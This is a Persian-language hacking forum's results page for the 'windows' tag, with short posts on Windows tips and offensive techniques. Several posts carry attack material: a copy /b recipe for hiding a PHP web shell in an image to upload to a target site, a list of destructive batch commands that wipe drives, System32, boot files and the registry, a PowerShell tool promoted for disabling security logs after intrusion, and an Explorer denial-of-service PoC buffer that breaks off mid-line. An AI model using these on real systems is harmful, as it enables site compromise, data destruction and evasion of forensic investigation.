امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'windows'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

267 نتیجه پیدا شد

  1. Rednofozi

    Windows

    https://www.microsoft.com/en-us/software-download/windowsinsiderpreviewserver لینک دانلود
  2. Black_petya

    Windows

    میخواهید سایتی را هک کنید و شل خود را روی ان سایت فراخوانی کنید یکی از راحت ترین روش های چسبناندن شل به عکس هست کافیه در cmd از دستور زیر استفاده کنید copy /b shell.php + photo.jpg sobhaneh.rar با دستور بالا میتوانید شل را به عکس بچسبانید نکته ( باید هر دوتا فایل را به یک فولدر ریخته و با دستور cd به دایرکتوری رفته و بعد اقدام به این کار بکنید) با اپلود شدن عکس در وب یک بار ادرس عکس را باز کنید بعد شل اتوماتیک روی سایت جایش را میگیرد. امید وارم خوشتان بیایید میتوانید با این روش ویروس را هم به عکس بچسپانید
  3. دور زدن راست کلیک چرا راست کلیک در بعضی سایت ها قفل شده است ؟ همه ما با سایت هایی رو به رو شده ایم که امکان کلیک راست در ان وجود ندارد به طور مثال ما نیاز به متن یک وبسایت داریم و بعد از انتخاب متن ها میخواهیم ان را کپی کنیم اما بعد از کلیک راست در صفحه هیج اتفاقی نمی افتد و پنجره مربوطه باز نمیشود اینکار برای جلو گیری از کپی شدن متن های وب سایت و دیده نشدن سورس های سمت کلاینت انجام میشود اما این کار نمیتواند امنیت ان را بالا ببرد و راه های بسیار زیادی برای دور زدن راست کلیک وجود دارند و ما در این اموزش قدم به قدم روش بایپس راست کلیک در مرورگر های مختلف را خواهیم گفت دور زدن راست کلیک به چه صورت انجام میشود ؟ ار انجایی که این کار با استفاده از کد های سمت کلاینت جاوا اسکریپت انجام میشود قابل شناسایی خواندن توسط کلاینت است پس کافیست برای دور زدن ان کد مربوطه را غیر فعال کنیم و به طوری که کلیک راست از حالت قفل خارج شود دور زدن راست کلیک در مرورگر کروم افزونه هایی برای این کار وجود دارند اما ما بدون استفاده از افزونه خاص و به راحت ترین روش جاوا اسکریپت را غیر فعال میکنیم ابتدا وارد منو کروم و بخش Settings شوید و در بخش Advanced بروید در این بخش Privacy را مشاهده میکنید و بهد از ورود به ان جاوا اسکریپت را مشاهده میکنید و کافیست ان را مانند تصویر زیر غیر فعال کنید روش راحت تری برای این کار وجود دارد برای این کار ادرس زیر را در url مرورگر وارد کنید chrome://settings/content/javascript?search=Content+settings بعد از وارد کردن ادرس java script را خواهید دید کافیت Allowed را غیر فعال و به حال Block در اورید و بعد از این کار وارد سایت قفل شده شوید و رفرش کنید حالا مشاهده خواهید کرد که محدودیت کلیک راست از بین رفته است و دور زدن راست کلیک به درستی انجام شده است دور زدن کلیک راست در مرورگر فایرفاکس فایر فاکس در نسخه های قدمی تر این امکان را داشته تا بدون استفاده از افزونه جاوا اسکریپت را غیر فعال کنید اما در نسخه جدید بدون استفاده از افزونه این امکان وجود ندارد برای این کار ابتدا از لینک زیر افزونه را در مرورگر فایرفاکس خود نصب کنید https://addons.mozilla.org/en-US/firefox/addon/disable-javascript/ و بعد از دانلود و نصب گزینه Add را وارد کنید تا افزونه فعال شود در منو مرورگر گزینه ای را برای خاموش و یا روشکن کردن جاوا اسکریپت خواهید دید که به راحتی قابل استفاده است و نیازی به توضیح بیشتری ندارد در صورتی که نیاز به اموزش دور زدن راست کلیک در مرورگر های دیگر دارید در بخش دیدگاه بفرمایید تا قرار بگیرد امیدواریم از اموزش دور زدن راست کلیک استفاده لازم را کرده باشید موفق و پیروز باشبد.
  4. نرم افزار Windows Defender یکی از نرم افزار های امنیتی رایگان است که توسط شرکت مایکروسافت مخصوص سیستم عامل های ویندوز ۱۰ و ۸ طراحی شده است. برخی از افراد به هر دلیلی که باشد، مایل به استفاده از این نرم افزار امنیتی نیستند، بنابراین به دنبال روش هایی برای غیرفعال کردن آن هستند. برای غیر فعال کردن Windows Defender روش هایی وجود دارد که در این پست آنها را مورد بررسی قرار خواهیم داد. با استفاده از کلید ترکیبی Windows key + R پنجره Run را باز کنید. عبارت gpedit.msc را تایپ کرده و بر روی دکمه OK کلیک کنید. در پنجره ای که برای شما باز می شود، مسیر زیر را دنبال کنید. Computer Configuration > Administrative Templates > Windows Components > Windows Defender در سمت راست، بر روی Turn off Windows Defender دابل کلیک کنید. برای غیر فعال شدن Windows Defender بر روی Enable کلیک کنید. بر روی دکمه OK کلیک کنید. کامپیوتر را مجددا راه اندازی کنید تا فرآیند غیر فعال کردن Windows Defender تکمیل شود. در صورتی که مایل باشد Windows Defender را مجددا راه اندازی نمایید کافیست همین مراحل را تکرار نمایید و در قسمت ۵ به جای Enable بر روی Not configured کلیک کنید.
  5. Anonyali

    Soft-Windows

    WeChat یک برنامه پیامرسانی و تماس است که به شما امکان می دهد به راحتی با خانواده و دوستان در سراسر کشور ارتباط برقرار کنید. این برنامه ارتباطات همه در یک برای متن (SMS / MMS)، تماس صوتی و تصویری و فایل ها است. • پیامرسانی چندرسانه ای: ارسال ویدئو، تصویر، متن و پیام های فایل. • گروه چت و CALLS: ایجاد چت گروهی با حداکثر 500 نفر و گروه های ویدئویی گروهی تا 9 نفر. • VOICE رایگان و VIDEO CALLS: تماس های رایگان با کیفیت بالا به هر نقطه در جهان است. • STICKER: صدها برچسب رایگان، سرگرم کننده و متحرک برای بیان احساسات شما. https://www.microsoft.com/en-us/p/wechat-for-windows/9nblggh4slx7?cid=msft_web_chart#activetab=pivot:overviewtab
  6. Moeein Seven

    Windows

    امروز قصد داریم شما رو با ۷ کد مخرب CMD ویندوز آشنا کنیم ! این هفت کد از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد… پس می فهمیم که قبل از اجرای فایل های Bat. حتما آنها را با یک Editor باز کرده و کد آنها را آنالیز کنیم ! به همین دلیل ما چند کد خطرناک رو به شما معرفی میکنیم که اگر فایلی با این مشخصاتی دیدید از اجرای آن خودداری کنید. ۱- فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن ! off del %systemdrive%\*.*/f/s/q shutdown –r –f –t 00 ۲- تبدیل تمامی پسوند ها اجرایی به پسوند Text. *.DOC*.TXT REN*.JPEG*.TXT REN *.LNK*.TXT REN *.AVI*.TXT REN *.MPEG*.TXT REN *.COM*.TXT REN *.BAT*.TXT ۳- حذف فایل مهم سیستمی”System32″ c:\WINDOWS\SYSTEM32\*.*/q ۴- این اجرا بشه سیستمی دیگه وجود نخواهد داشت off attrib –r –s –h c:\autoexec.bat del c:\autoexec.bat attrib –r –s –h c:\boot.ini del c:\boot.ini attrib –r –s –h c:\ntldr del c:\ntldr attrib –r –s –h c:\windows\win.ini del c:\windows\win.ini ۵- حذف تمامی ریجستری ها OFF START reg delete HKCR/.EXE START reg delete HKCR/.dll START reg delete HKCR/* ۶- نابودی تمامی کانکشن های اینترنتی... @echo off >c:windowswimn32.bat echo break off >>c:windowswimn32.bat echo ipconfig /release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machineoftwindowscurrentversionrun /v WINDOWsAPI/t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit/t reg_sz /d c:windowswimn32.bat /f PAUSE ۷- فرمت درایو ها ( خودتون میتونید بهش اضافه کنید ) D:\ rd/s/q C:\ rd/s/q E:\ تا حد امکان از این کامنت ها استفاده نکنید؛ مسئولیت استفاده از این کامنتها بر عهده خودتان هست موفق باشید..!
  7. دیپ وب مجموعه بزرگی از دنیای شبکه است که قابل دسترس برای کاربران معولی و متور های جستجو نیست و به همین دلیل شناسایی شدن کاربران ان بسیار امر سخت و یا غیر ممکن است اما در این اموزش موتور های جستجو دارک نت را معرفی میکنیم و وارد این سایت های دارک نت میشویم GitHub - TheTorProject/gettorbrowser: This is a repository to provide links for downloading Tor Browser from Github.
  8. Event Viewer یک برنامه پیشفرض در ویندوز میباشد که تمامی عملکرد های ویندوز را در خود ثبت میکند این عملکرد ها شامل اتصالات , مشکلات امنیتی , اخطار ها و انواع اتفاق های درون سیستم این برنامه از بخش های مختلفی تشکیل میشود بخش لاگ های ویندوز و بخش لاگ های اپلیکیشن ها , بعد از نفوذ به یک سیستم ویندوزی ما نیاز به غیر فعال کردن ذخیره لاگ های بخش ویندوز داریم به همین دلیل ابزاری نوشته شده برای پاورشل را اماده کرده ایم تا با استفاده از ان عملیات لاگ کردن اطلاعات ویندوز را متوقف کنید یکی از مهم ترین بخش های لاگ های ویندوز لاگ های security میباشند که این ابزار به صورت کامل این بخش را غیر فعال میکند و اجازه لاگ های جدید را نمیدهد نکته : این ابزار چون به زبان پاورشل نوشته شده است در انواع ویندوز ها قابل استفاده است و نیاز به هیچ برنامه جانبی ندارد همچنین نکته جالب که بعد از استفاده از این ابزار برای حذف ردپا منابع سیستم کمتر مصرف میشوند و درنتیجه سرعت بهتری خواهید داشت و یک قدم مهم برای جلوگیری از عملیات فارنزیک را انجام میدهید نصب و اجرای برنامه ازبین بردن ردپا ابتدا از بخش دانلد در پایین صفحه ابزار را دانلود کنید سپس از حالت فشرده ان را خارج کنید و برنامه اصلی با فورمت .ps1 را در پاورشل اجرا کنید سپس دستور زیر را وارد کنید تا عملیات حذف ردپا انجام شود Invoke-Phant0m
  9. Rednofozi

    Windows

    ز مزایای موجود در ارتباط با تمام روش هایی که به حفظ هرچه بیشتر ایمنی و امنیت رایانه شما در ارتباط با Windows کمک می کنند، برخوردار شوید. مرکز عملیات برای اطمینان از اینکه دیوار آتش روشن است، نرم افزار ضدویروس به روز است و اینکه رایانه شما بگونه ای تنظیم شده است تا به روز رسانی ها را بصورت خودکار نصب کند، مرکز عملیات را بررسی کنید. مدافع Windows از مدافع Windows استفاده کنید تا در برابر نصب ویروس ها، نرم افزارهای جاسوسی و انواع دیگر نرم افزارهای بدخواهانه یا ناخواسته در رایانه شما و بدون اطلاع شما جلوگیری شود. برای اطلاعات بیشتر به چرا از مدافع Windows استفاده کنم؟مراجعه کنید. کنترل حساب کاربری کنترل حساب کاربر (UAC) را تنظیم کنید تا قبل از نصب نرم افزار یا باز کردن برخی از انواع خاص از برنامه هایی که احتمالاً مضر هستند یا احتمال خطرهای امنیتی دارند، از شما سؤال شود. سابقه پرونده از سابقه پرونده استفاده کنید تا مرتباً از پرونده های شخصی شما بصورت خودکار نسخه پشتیبان تهیه شود—مانند عکس، اسناد و موسیقی. اگر رایانه شما دارای یک نقص سخت افزاری است، می توانید هرکدام از نسخه های پرونده که برایتان از اهمیت بیشتری برخوردار هستند را بازیابی کنید. برای کسب اطلاعات بیشتر، به نحوه استفاده از سابقه پرونده مراجعه کنید. Windows Update Windows Update بصورت خودکار می تواند جدیدترین به روز رسانی ها را برای رایانه شما بارگیری کرده و نصب کند. دیوار آتش Windows دیوار آتش Windows از شما در برابر هکرها و نرم افزارهای برنامه های بدخواهانه مانند ویروس محافظت می کند و مانع از دسترسی به رایانه شما از طریق اینترنت می شود.
  10. Rednofozi

    Windows

    ممکن است برنامه هایی روی ویندوز شما نصب باشد که پس از مدتی،زمان استفاده رایگان از آن ها پایان میابد بنابراین بایداینترنت را برای یافتن کرک آن زیر و رو کنید اما اکنون قصد داریم ترفندی را به شما معرفی کنیم که با استفاده از آن میتوانید همه ي برنامه ها را از طریق رجیستری ویندوز کرک کنید. از منوی استارت وارد Runشوید سپس عبارت regedit را تایپ کنید تا ویرایشگر رجیستری باز شود حال وارد HKEY_CURRENT_USER / software شوید و به دنبال نام برنامه مورد نظر بگردید و روی آن دوبار کلیک کنید حال از قسمت دیگر برروی maxusagel دوبار کلیک کنیدودر پنجره ی باز شده اگر maxusagel وجود نداشت یعنی برنامه اکتیو است و نیازی به کرک کردن آن نیست. و بعد از باز شدن مقدارvalue آن را به 1 تغیر دهید.
  11. Rednofozi

    Windows

    در ویندوز Server و در Active Directory Installation Wizard هنگام نصب AC از شما خواسته می شود پسوردی راتحت عنوان Directory Services Restore Mode Administrator Password انتخاب نمایید که به آن پسورد Disaster Recovery Mode یا DSRM نیز گفته می شود. در ادامه نحوه تغییر این پسورد برای Windows Server 2000 و Windows Server 2003 را آموزش می دهیم. نکته: برای ویندوز سرور ۲۰۰۸ همانند ۲۰۰۳ عمل کنید. برای Windows Server 2000: با استفاده از دستور CD %SystemRoot%\System32 در command prompt وارد فولدر System32 شده و دستور Setpwd را اجرا کرده و هنگامی که Directory Services Restore Mode password از شما سوال شد پسورد مورد نظر را وارد کنید. برای Windows Server 2003: در command prompt دستور ntdsutil را اجرا کنید. سپس در مقابل :ntdsutil عبارت set dsrm password را تایپ کنید. حال مقابل :Reset DSRM Administrator Password جمله reset password on server Server Name را بنویسید که البته بجای Server Name باید نام سرور خود را بنویسید. حال در جلوی عبارت :Please type password for DS Restore Mode Administrator Account پسورد مورد نظر را نوشته و سپس آنرا تایید نمایید. اگر این مراحل را صحیح انجام داده باشید عبارت Password has been set seccessfully را مشاهده می کنید و برای خروج جلوی Reset DSRM Administrator Password کلمه quit را وارد کنید و در مقابل ntdsutil نیز quit را نوشته و Enter کنید.
  12. Rednofozi

    Windows

    ممکن است شما در یک کامپیوتر تک کاربره بخواهید که پس از بوت شدن سیستم مستقیماً و بدون پرسیدن پسورد در Welcome Screen وارد ویندوز شوید حال آنکهUser Account شما الزاماً باید دارای پسورد (Password Protected) باشد؛ مثلاً برای زدن Remote Desktop به آن. در ادامه نحوه ایجاد چنین شرایطی را توضیح خواهیم داد. پس از دادن پسورد به User Account خود عبارت control userpasswords2 را در Run تایپ کرده و بر روی OK کلیک کنید. سپس در تب Users از پنجره User Accounts که باز شده است تیک کنار جمله Users must enter a user name and password to use the computer را بردارید و بر روی OK کلیک کنید. اکنون دیگر هنگام بالا آمدن ویندوز از شما پسوردتان سوال نمی شود در حالی که User Account شما Password Protected است
  13. میبینید که برای هر کاری در GPO یک راهکار وجود دارد، همانطور که می دانید پس به عضویت در آوردن کامپیوتری در یک Domain هنگامی که کاربر می‌خواهد به سیستم Login نماید ابتدا باید سه کلید Alt+Ctl+Del را نگه دارد تا صفحه مربوط به وارد کردن Username و Password ظاهر شود. حال در این مقاله برآنیم تا با انجام روشی‌ نسبتاً ساده دیگر نیازی به زدن Alt+Ctl+Del برای مشاهده این صفحه نباشد و پس از روشن کردن سیستم مستقیماً Username و Password را وارد نمائید. تنظیمات این روش را می‌توان به دو طریق اعمال کرد؛ یکی‌ اینکه تنظیمات را بر روی خود Domain Controller اعمال کنید و یا اینکه بر روی هر کدام از کامپیوتر‌های عضو Domain که می‌خواهید، این تنظیمات را انجام دهید. در ادامه هر دو طریق را بررسی‌ خواهیم کرد. برای اینکه بتوانید از طریق DC این تنظیمات را روی سیستم های دلخواه عمل نمائید ابتدا وارد Active Directory User and Computers شوید و سپس یک Organizational Unit یا همان OU جدید ایجاد نمایید. (برای این منظور کافیست در منو سمت چپ بر روی نام Domain خود رایت کلیک کرده و و از زیر منو New عبارت Organizational Unit را انتخاب نمایید و در پنجره باز شده یک نام به آن اختصاص دهید.) سپس مجموعه کامپیوتر هایی که می خواهید تنظیمات مورد نظر رویشان اعمال شود را از فولدر Computers به داخل OU ساخته شده انتقال دهید که برای این کار می توانید از Drag and Drop یا Move استفاده کنید. حال بر روی فولدر OU ساخته شده رایت کلیک کرده و Properties را انتخاب کنید و از پنجره باز شده به تب Group Policy رفته و بر روی New کلیک کنید تا یک Group Policy Object جدید ایجاد شود و پس از دادن نام دلخواه به آن بر روی Edit کلیک کرده و در پنجره Group Policy Object Editor که باز می شود به مسیر زیر بروید: Computer ConfigurationWindows SettingsSecurity SettingsLocal PoliciesSecurity Options حال در قسمت راست بر روی Interactive Logon: Do not Require CTRL+ALT+DEL دابل کلیک کنید و در پنجره Properties مربوط به آن تیک کنار Define this policy setting را زده و Enable را انتخاب کنید و سپس OK نمایید. اکنون Run را باز کرده و gpupdate /force را در آن تایپ کنید و OK را بزنید. پس از چند دقیقه هر کدام از کامپیوتر هایی که داخل این OU هستند را روشن نمایید دیگر پیام زدن Alt+Ctl+Del را مشاهده نمی کنید. اگر هم خواستید این تنظیمات را فقط بر روی یک کامپیوتر عضو Domain به صورت Local پیاده سازی کنید ابتدا در آن کامپیوتر Run را باز کنید و در آن عبارت secpol.msc را وارد کرده و OK کنید. حال در پنجره Local Security Settings که باز شده است به مسیر زیر بروید: Local PoliciesSecurity Options و همانند بالا در قسمت راست بر روی Interactive Logon: Do not Require CTRL+ALT+DEL دابل کلیک کنید و در پنجره Properties مربوط به آن تیک کنار Define this policy setting را زده و Enable را انتخاب کنید و سپس OK نمایید. اکنون Run را باز کرده و gpupdate /force را در آن تایپ کنید و OK را بزنید.
  14. Rednofozi

    Windows

    با استفاده از EEMدر سیسکو که از ورژن 12.4 امکان استفاده از آن وجود دارد شما می­توانید وقایع را مدیریت کنید یعنی به هنگام وقوع هرEventمجوع اعمال خاصی صورت پذیرد که در این مثال به هنگام وقوع ذخیره پیکربندی به عنوان Startupباید یک Backupنیز از پیکربندی فعلی یعنیRunning-Configذخیره گردد. event manager applet mahyar event cli pattern “wr.*|wr.* mem.*|copy run.* start.*” sync yes action 1.0 cli command “enable” action 2.0 cli command “copy startup-config tftp://10.0.0.1/test2.txt” action 3.0 syslog msg "Backup Complete….." ! و یا در روشی آسان تر ip ftp username ftp-username ip ftp password ftp-password archive path ftp://202.163.x.x/routerconfig/$h write-memory time-period 21600
  15. Rednofozi

    Windows

    مایکروسافت سیستم سنتر یا Microsoft System Center در حقیقت یک مجموعه از محصولات مدیریتی مایکروسافت است که برای کمک کردن به مدیران IT سازمان ها برای مدیریت و پشتیبانی بهتر و آسانتر سیستم های سرور و کلاینت در شبکه های تحت این سیستم عامل طراحی شده است و شامل محصولات متنوعی است که هر کدام به منظور بر طرف سازی بخشی از نیاز یک مدیر IT طراحی شده اند به شرح زیر هستند : Microsoft System Center Configuration Manager یا به اصطلاح SCCM نمونه بروز شده محصول قبلی مایکروسافت در سال 2003 بوده که با نام Systems Management Server یا SMS شناخته میشده است و مهمترین وظایف آن مدیریت تنظیمات ، مدیریت منابع سخت افزاری و نرم افزاری و توزیع بسته های امنیتی به روی کلاینت ها ( Patch Deployment) می باشد . Microsoft System Center Data Protection Manager یا به اصطلاح SCDPM نمونه کاملی از یک نرم افزار تهیه نسخه پشتیبان از سیستم ها ( Backup) و بازگردانی اطلاعات در مواقع بروز حادثه ( Disaster Recovery) برای محصولات مایکروسافت است . دوستانی که با نرم افزارهایی مثل Acronis و Symantec Backup Exec کار کردند بهتر میدونن که این یک نمونه از همینگونه نرم افزار هاست . Microsoft System Center Operations Manager یا به اصطلاح SCOM نرم افزار بسیار قدرتمند برای پایش یا مانیتورینگ و گزارش گیری از عملکرد سرویس های و برنامه های کابردی تحت سیستم عامل مایکروسافت است . Microsoft System Center Essentials به اصطلاح SCE ترکیبی از SCOM و WSUS ( سیستم بروز رسانی مرکزی مایکروسافت یا Windows Server Update Services) System Center Mobile Device Manager یا به اصطلاح SCMDM همانطور که از اسمش پیداست برای مدیریت ابزارهای موبایل مثل PDA و SmartPhone ها بکار میرود. Microsoft System Center Virtual Machine Manager یا به اصطلاح SCVMM همانطور که از اسمشی پیداست برای مدیریت ماشین های مجازی و مجازی سازی دیتا سنتر ها استفاده میشود . Microsoft System Center Opalis یا به اصطلاح SCO اپالیس یک سیستم مکانیزه شده برای هماهنگ سازی ابزارهای فناوری اطلاعات در کنار هم است و هدف اصلی آن کاهش هزینه های مدیریت دیتا سنتر در عین بالا بردن قابلیت های پردازشی فناوری اطلاعات در سازمان است . این نرم افزار توان مکانیزه سازی قابلیت های موجود ( Best Practices ) در محصول (MOF ( Microsoft Operations Framework و همچنین هماهنگی کامل با ITIL را دارد
  16. تنظیم قدرت ، میتواند برای برنامه هایی که در پس زمینه اجرا میشوند بسیار کارامد باشد،هدف اصلی از تنظیم قدرت این است که به شما کمک میکند مدت زمان بیشتری بتوانید از باتری لبتاب خودتان ، استفاده کاربردی داشته باشید و میزان برق مصرفی را در حین شارژ کمتر کند. برای انجام این کار مراحل زیر را طی می‌کنیم : ابتدا تنظیمات برنامه ها را باز کرده و به مسیر System>Battery بروید در بالایه صفحه ، یعنی در زیر گزینه ای که میزان شارژ باتری را نشان میدهد ، رویه Battery usage by app کلیک کنید شما لیست تمام برنامه هایی که نصب کرده اید را مشاهده میکنید و ممکن است در زیر بعضی از برنامه ها نوشته شده باشد Managed by Windows ، این ها برنامه هایی هستند که ویندوز ۱۰ به صورت خودکار برای انها تنظیم قدرت را فعال کرده است رویه برنامه کلیک کرده و گزینه Let Windows decide when this app can run in the background را بزنید، با این کار این برنامه در پس زمینه محدود خواهد شد . برای غیر فعال کردن آن نیز کافیست تیک ای گزینه را بردارید و تیک گزینه Allow this app to run background tasks را بزنید
  17. Moeein Seven

    Windows

    هیچ چیز بدتر از این نیست که لپ‌تاپ خود را گم کنیم و یا کسی آن را از ما بدزدد. خوشبختانه به لطف سرویس‌های مکان یاب، یافتن دستگاه‌های گم شده بسیار ساده شده و ویندوز10 قابلیت‌های امنیتی بسیار خوبی از جمله یافتن لپ‌تاپ‌های گم شده دارد. اما باید پیش از آن که لپ‌تاپتان دزدیده شود این قابلیت را فعال کنید! به Settings > Update & Security > Find My Device بروید. اگر سرویس مکان یاب شما روشن است به بخش بعدی بروید. اگر نه یک لینک می‌بینید: Turn on location settings to use this feature. روی لینک کلیک کنید. سپس تنظیمات مکان را می‌بینید. زیر گزینه‌ی Location for this device is off روی Change کلیک کنید و سوئیچ آن را روشن کنید ( برای دسترسی به این صفحه می‎توانید به Settings > Privacy > Location بروید.) به تب Find My Device بازگردید. زیر گزینه‌ی Find My Device is off روی Change کلیک کرده و سوئیچ گزینه را روشن کنید. ممکن است از شما خواسته شود که به حساب کاربری Outlook خود بروید. برای مشاهده‌ی مکان دستگاه خود به account.microsoft.com/devices بروید. در این قسمت لیست دستگاه‌هایی را که از حساب کاربری ویندوز شما استفاده می‌کنند را می‌بینید. در این قسمت هر دستگاه که حساب کاربری شما روی آن تنظیم شده باشد به شما نشان داده می‌شود. در این قسمت می‌توانید ببینید که دستگاه شما آخرین بار چه زمانی و کجا دیده شده است. روی Find my device کلیک کرده تا مکان را روی نقشه ببینید.
  18. در صورتی که به تازگی از ویندوز های ۷ یا ۸٫۱ به ویندوز ۱۰ مهاجرت کرده اید، حتما میدانید که در این نسخه از سیستم عامل، دیگر از برنامه Windows Photo Viewer که برای نمایش عکس ها در ویندوز ۷ و ۸٫۱ استفاده می شد خبری نیست و شما برای مشاهده تصاویر میبایست از اپلیکیشن Photos استفاده کنید. اپلیکیشن Photos یکی از اپلیکیشن های جدید و پیشفرض ویندوز ۱۰ است که برای نمایش عکس ها کاربرد دارد. اما متاسفانه این اپلیکیشن سه مشکل عمده دارد که برخی از کاربران را مایل می سازند تا از همان برنامه قدیمی نمایش عکس در ویندوز استفاده کنند. این سه مشکل عمده، سنگین بودن و کند عمل کردن برنامه Photos ، تحت مترو بودن و کیفیت پایین نمایش عکس ها است. در مطلب امروز تصمیم داریم نحوه فعالسازی برنامه Windows Photo Viewer در ویندوز ۱۰ که برای نمایش تصاویر کاربرد دارد را آموزش دهیم. ابتدا فایل PhotoViewer را دانلود و از حالت فشرده خارج کنید. بر روی فایل دانلود شده (PhotoViewer.reg) دوبار کلیک کنید تا اجرا شود. حال ویندوز یک پیغام با عنوان " آیا می خواهید این فایل اجرا شده بر روی رجیستری اعمال شود؟" به شما نمایش می دهد که نیاز است برای تایید بر روی کلید Yes کلیک کنید. اکنون پس از مشاهده پیغام زیر، برنامه Windows Photo Viewer روی ویندوز ۱۰ شما فعال خواهد شد. منبع : Anonysec
  19. # Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC) # Date: 2018-09-01 # Exploit Author: Ghaaf # Vendor Homepage: http://www.microsoft.com # Version: Windows 7(x86/x64) # Tested on: 6.1.7601 Service Pack 1 Build 7601 # CVE: N/A buffer = '' buffer += "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00" buffer += "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00" buffer += "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68" buffer += "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F" buffer += "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20" buffer += "\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00" buffer += "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88" buffer += "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88" buffer += "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00" buffer += "\xE8\x2D\x73\x54\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x0F\x01" buffer += "\x0B\x01\x06\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00" buffer += "\x68\x11\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00" buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00" buffer += "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x10\x00\x00" buffer += "\xB2\xEA\x00\x00\x02\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00" buffer += "\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x94\x1A\x00\x00\x28\x00\x00\x00" buffer += "\x00\x30\x00\x00\xA4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x28\x02\x00\x00\x20\x00\x00\x00" buffer += "\x00\x10\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x2E\x74\x65\x78\x74\x00\x00\x00\x38\x0D\x00\x00\x00\x10\x00\x00" buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x64\x61\x74\x61\x00\x00\x00" buffer += "\xE0\x09\x00\x00\x00\x20\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0" buffer += "\x2E\x72\x73\x72\x63\x00\x00\x00\xA4\x08\x00\x00\x00\x30\x00\x00" buffer += 